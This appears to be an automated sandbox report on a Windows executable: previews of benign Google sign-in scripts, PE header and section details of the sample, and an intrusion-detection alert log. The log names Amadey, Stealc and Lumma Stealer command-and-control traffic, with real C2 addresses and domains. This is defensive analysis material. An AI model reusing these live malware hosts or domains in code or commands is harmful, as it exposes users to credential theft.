URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.PqO-Y4U4tl0.es5.O/ck=boq-identity.AccountsSignInUi.nq70RHujW6U.L.B1.O/am=5MFgKBimEQjEE54DekBRIOQAAAAAAAAAAKANAAB0DA/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EIOG1e,EN3i8d,Fndnac,GwYlN,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MY7mZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,XVq9Qb,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZakeSe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,eVCnO,f8Gu1e,gJzDyc,hc6Ubd,iAskyc,inNHtf,iyZMqd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,mzzZzc,n73qwf,njlZCf,oLggrd,pxq3x,q0xTif,qPYxq,qPfo0c,qmdT9,rCcCxc,rmumx,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,vvMGie,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFUNoJA9_Qld_Efe4B4naRfqJdPqA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("Wt6vjf");.var fya=function(){var a=_.He();return _.Nj(a,1)},au=function(a){this.Da=_.t(a,0,au.messageId)};_.J(au,_.v);au.prototype.Ha=function(){return _.Fj(this,1)};au.prototype.Ua=function(a){return _.Xj(this,1,a)};au.messageId="f.bo";var bu=function(){_.km.call(this)};_.J(bu,_.km);bu.prototype.xd=function(){this.NT=!1;gya(this);_.km.prototype.xd.call(this)};bu.prototype.aa=function(){hya(this);if(this.JC)return iya(this),!1;if(!this.UV)return cu(this),!0;this.dispatchEvent("p");if(!this.HP)return cu(this),!0;this.NM?(this.dispatchEvent("r"),cu(this)):iya(this);return!1};.var jya=function(a){var b=new _.gp(a.b5);a.vQ!=null&&_.Mn(b,"authuser",a.vQ);return b},iya=function(a){a.JC=!0;var b=jya(a),c="rt=r&f_uid="+_.rk(a.HP);_.fn(b,(0,_.bg)(a.ea,a),"POST",c)};.bu.prototype.ea=function(a){a=a.target;hya(this);if(_.jn(a)){this.iK=0;if(this.NM)this.JC=!1,this.dispatchEvent("r"
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (522)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):5050
                                                                                                                                      Entropy (8bit):5.30005628600801
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:o75BuBxJfma7bGZABddEgf8nI4zLm4KGo8Vh1EabPVTq8fv/xRw:WHMmaX9r8Igp7nBlHo
                                                                                                                                      MD5:D9F15F1AEAF15673336FAA3507D1A2A7
                                                                                                                                      SHA1:FC79D00AF2E2D44FEBA701F12ECD4AFCA327F464
                                                                                                                                      SHA-256:AA3574ADCF3826390918BC2D5DCD88D7BC63238A6022DEF3487A67A731C30E7A
                                                                                                                                      SHA-512:D756961B6BFC478274E390B94D613BD837DA011D680FC6D67779A8E12C7F082EF977FC15D02C076F92BC1D2CE7EFDE48F82B4EC1BD12CF38AEDDAB1917E36041
                                                                                                                                      Malicious:false
                                                                                                                                      URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.PqO-Y4U4tl0.es5.O/ck=boq-identity.AccountsSignInUi.nq70RHujW6U.L.B1.O/am=5MFgKBimEQjEE54DekBRIOQAAAAAAAAAAKANAAB0DA/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EIOG1e,EN3i8d,Fndnac,GwYlN,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MY7mZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,XVq9Qb,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZakeSe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,eVCnO,f8Gu1e,gJzDyc,hc6Ubd,iAskyc,inNHtf,iyZMqd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,mzzZzc,n73qwf,njlZCf,oLggrd,pxq3x,q0xTif,qPYxq,qPfo0c,qmdT9,rCcCxc,rmumx,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,vvMGie,w9hDv,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFUNoJA9_Qld_Efe4B4naRfqJdPqA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=wg1P6b"
                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.oNa=_.z("wg1P6b",[_.XA,_.Fn,_.Nn]);._.k("wg1P6b");.var f6a;f6a=_.mh(["aria-"]);._.yJ=function(a){_.X.call(this,a.Fa);this.Ka=this.xa=this.aa=this.viewportElement=this.Na=null;this.Jc=a.Ea.ef;this.ab=a.Ea.focus;this.Fc=a.Ea.Fc;this.ea=this.Qi();a=-1*parseInt(_.Fo(this.Qi().el(),"marginTop")||"0",10);var b=parseInt(_.Fo(this.Qi().el(),"marginBottom")||"0",10);this.Ta={top:a,right:0,bottom:b,left:0};a=_.cf(this.getData("isMenuDynamic"),!1);b=_.cf(this.getData("isMenuHoisted"),!1);this.Ga=a?1:b?2:0;this.ka=!1;this.Ca=1;this.Ga!==1&&(this.aa=this.Sa("U0exHf").children().Wc(0),_.ku(this,.g6a(this,this.aa.el())));_.oF(this.oa())&&(a=this.oa().el(),b=this.we.bind(this),a.__soy_skip_handler=b)};_.J(_.yJ,_.X);_.yJ.Ba=function(){return{Ea:{ef:_.cF,focus:_.OE,Fc:_.uu}}};_.yJ.prototype.IF=function(a){var b=a.source;this.Na=b;var c;((c=a.data)==null?0:c.qz)?(a=a.data.qz,this.Ca=a==="MOUS
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (553)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):744316
                                                                                                                                      Entropy (8bit):5.792609211069255
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:n5bdWK/20rOQKKQtvqUGSGDdPSxdZqmguaH:nOeKGSpguA
                                                                                                                                      MD5:25F51A1555D1285FE5A2E5257FC514C8
                                                                                                                                      SHA1:77CF5942A99A1440D296B668AEBF43BA7B795EB9
                                                                                                                                      SHA-256:D2516587FD91E772341AE4C4C534EAE55E1C2F692ED2CE60EA36621C01EC666E
                                                                                                                                      SHA-512:566A84271B8E3672078239A3D8FD34FE7059BCA1959A4FCB5B27FF1DC88206030575FFC67742EC81D78775831DD91C978CFC5C80F80ACE53B7A14A1BD5F5D21A
                                                                                                                                      Malicious:false
                                                                                                                                      URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.PqO-Y4U4tl0.es5.O/am=5MFgKBimEQjEE54DekBRIOQAAAAAAAAAAKANAAB0DA/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlGRjSKcPrDEBPLLHUwf2sE4iFvUvg/m=_b,_tp"
                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x2860c1e4, 0x20469860, 0x39e13c40, 0x14501e80, 0xe420, 0x0, 0x1a000000, 0x1d000003, 0xc, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var baa,daa,Na,Ta,gaa,iaa,jb,qaa,waa,Caa,Haa,Kaa,Jb,Laa,Ob,Qb,Rb,Maa,Naa,Sb,Oaa,Paa,Qaa,Yb,Vaa,Xaa,ec,fc,gc,bba,cba,gba,jba,lba,mba,qba,tba,nba,sba,rba,pba,oba,uba,yba,Cba,Dba,Aba,Hc,Ic,Gba,Iba,Mba,Nba,Oba,Pba,Lba,Qba,Sba,dd,Uba,Vba,Xba,Zba,Yba,aca,bca,cca,dca,fca,eca,hca,ica,jca,kca,nca,
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (468)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):1858
                                                                                                                                      Entropy (8bit):5.297658905867848
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:o7vjoGL3AeFkphnpiu7cOyBfO/3d/rYrv3Zrw:ofrLxFuLdyp2AVw
                                                                                                                                      MD5:B42DB3D22B12B8E3BE1B82961FE2870E
                                                                                                                                      SHA1:D9CFD11C1C2DE17A7E9301F11AD875B610B96576
                                                                                                                                      SHA-256:75DC40A81CEACB57940F84D2B29E021974C3004B245CC7198362CA944E9C4058
                                                                                                                                      SHA-512:EC0708797586F8F85EC8A0BBECA707D73778D93C12986B92965D1828B254D39485926354AEC4D73474BC5755E392B813D8045B19369FAE23B30BBD12E17F7053
                                                                                                                                      Malicious:false
                                                                                                                                      URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.PqO-Y4U4tl0.es5.O/ck=boq-identity.AccountsSignInUi.nq70RHujW6U.L.B1.O/am=5MFgKBimEQjEE54DekBRIOQAAAAAAAAAAKANAAB0DA/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EIOG1e,EN3i8d,Fndnac,GwYlN,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MY7mZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,XVq9Qb,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZakeSe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,eVCnO,f8Gu1e,gJzDyc,hc6Ubd,inNHtf,iyZMqd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,mzzZzc,n73qwf,njlZCf,oLggrd,pxq3x,q0xTif,qPYxq,qPfo0c,qmdT9,rCcCxc,rmumx,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,vvMGie,w9hDv,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFUNoJA9_Qld_Efe4B4naRfqJdPqA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=iAskyc,ziXSP"
                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("iAskyc");._.QZ=function(a){_.W.call(this,a.Fa);this.window=a.Ea.window.get();this.Mc=a.Ea.Mc};_.J(_.QZ,_.W);_.QZ.Ba=function(){return{Ea:{window:_.tu,Mc:_.HE}}};_.QZ.prototype.Po=function(){};_.QZ.prototype.addEncryptionRecoveryMethod=function(){};_.RZ=function(a){return(a==null?void 0:a.Jo)||function(){}};_.SZ=function(a){return(a==null?void 0:a.r3)||function(){}};_.VPb=function(a){return(a==null?void 0:a.Qp)||function(){}};._.WPb=function(a){return new Map(Array.from(a,function(b){var c=_.n(b);b=c.next().value;c=c.next().value;return[b,c.map(function(d){return{epoch:d.epoch,key:new Uint8Array(d.key)}})]}))};_.XPb=function(a){setTimeout(function(){throw a;},0)};_.QZ.prototype.qO=function(){return!0};_.qu(_.Dn,_.QZ);._.l();._.k("ziXSP");.var j_=function(a){_.QZ.call(this,a.Fa)};_.J(j_,_.QZ);j_.Ba=_.QZ.Ba;j_.prototype.Po=function(a,b,c){var d;if((d=this.window.chrome)==nu
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.949840626888764
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:8ObkdHP9Hq.exe
                                                                                                                                      File size:1'889'792 bytes
                                                                                                                                      MD5:77b69071ccc75e75a48ea59d48a55a30
                                                                                                                                      SHA1:1462b225e40ce72df31075d9ca920a356818fe3c
                                                                                                                                      SHA256:e7dd285dc9f2ba81816427bb3a6f90645deb0b8d346d2edb81e9283a1bdbf787
                                                                                                                                      SHA512:e120055b5c27aa9d6f65ca3ea00c5cdbce421989627c197c53f25410aac35740499c86aa8eeb25eebb387397364363e79825a2cf05c0e333a52e1a2d9f0cde4f
                                                                                                                                      SSDEEP:49152:dgx2kOoNM8s9iuz17ZfuA37h94+JqDn9KuOVZ+YuF1:dgWoS8GFZp3V94bj9leZ+3
                                                                                                                                      TLSH:AC9533CC966514D6DD43A438CAACC68897F0D4E837FDBB1614BF1CBE460B83996B6131
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                      Entrypoint:0x8b0000
                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:6
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:6
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:6
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                      Instruction
                                                                                                                                      jmp 00007FD0B470AF6Ah
                                                                                                                                      lfs ebx, dword ptr [eax+eax]
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      jmp 00007FD0B470CF65h
                                                                                                                                      add byte ptr [edi], al
                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], dh
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add bh, bh
                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4aeb1c0x10hicznzml
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x4aeacc0x18hicznzml
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      0x10000x680000x2de004c44002c229a86d41fe8981d92ad7014False0.9982065309945504data7.985482798218243IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rsrc0x690000x1e00x200b7d16686b376821266a9345c26b7e6d6False0.53125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      0x6b0000x2a80000x20075615a5c8e4b40d3851bdfb983630caeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      hicznzml0x3130000x19c0000x19bc000c7891fea511fcf36066f85f7106550eFalse0.9947466036733454data7.954513135451816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      rbflpxvq0x4af0000x10000x400803e0b1581a67165e0643284ca83fc8cFalse0.765625data6.056773970755035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .taggant0x4b00000x30000x2200bbc36a45094dafe639429642bc541aacFalse0.064453125DOS executable (COM)0.6660387283573721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_MANIFEST0x690600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                      DLLImport
                                                                                                                                      kernel32.dlllstrcpy
                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      EnglishUnited States
                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-10-07T03:23:06.470678+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449788185.215.113.4380TCP
                                                                                                                                      2024-10-07T03:23:09.457328+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449810185.215.113.10380TCP
                                                                                                                                      2024-10-07T03:23:12.788051+02002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449804TCP
                                                                                                                                      2024-10-07T03:23:13.485515+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449836185.215.113.4380TCP
                                                                                                                                      2024-10-07T03:23:14.334415+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449842185.215.113.10380TCP
                                                                                                                                      2024-10-07T03:23:14.334415+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449842185.215.113.10380TCP
                                                                                                                                      2024-10-07T03:23:16.011313+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449854185.215.113.3780TCP
                                                                                                                                      2024-10-07T03:23:17.841800+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449872185.215.113.4380TCP
                                                                                                                                      2024-10-07T03:23:18.561231+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449879185.215.113.10380TCP
                                                                                                                                      2024-10-07T03:23:21.564333+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.4602821.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:21.575022+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.4654961.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:21.589812+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.4514331.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:21.613978+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.4626761.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:21.626466+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.4491861.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:21.647743+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.4537461.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:21.662027+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.4502721.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:21.683050+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.4550381.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:23.082188+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.461038185.215.113.4380TCP
                                                                                                                                      2024-10-07T03:23:23.986667+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.461043104.21.53.8443TCP
                                                                                                                                      2024-10-07T03:23:23.986667+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.461043104.21.53.8443TCP
                                                                                                                                      2024-10-07T03:23:34.740482+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.461131185.215.113.3780TCP
                                                                                                                                      2024-10-07T03:23:43.117801+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.4516491.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:43.128999+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.4561701.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:43.140460+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.4528891.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:43.150741+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.4560351.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:43.161724+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.4543101.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:43.173115+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.4632941.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:43.183098+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.4510581.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:43.193494+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.4587351.1.1.153UDP
                                                                                                                                      2024-10-07T03:23:59.307685+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.461184185.215.113.3780TCP
                                                                                                                                      2024-10-07T03:24:06.988623+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.4621591.1.1.153UDP
                                                                                                                                      2024-10-07T03:24:06.999080+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.4560281.1.1.153UDP
                                                                                                                                      2024-10-07T03:24:07.014039+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.4638221.1.1.153UDP
                                                                                                                                      2024-10-07T03:24:07.025019+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.4499321.1.1.153UDP
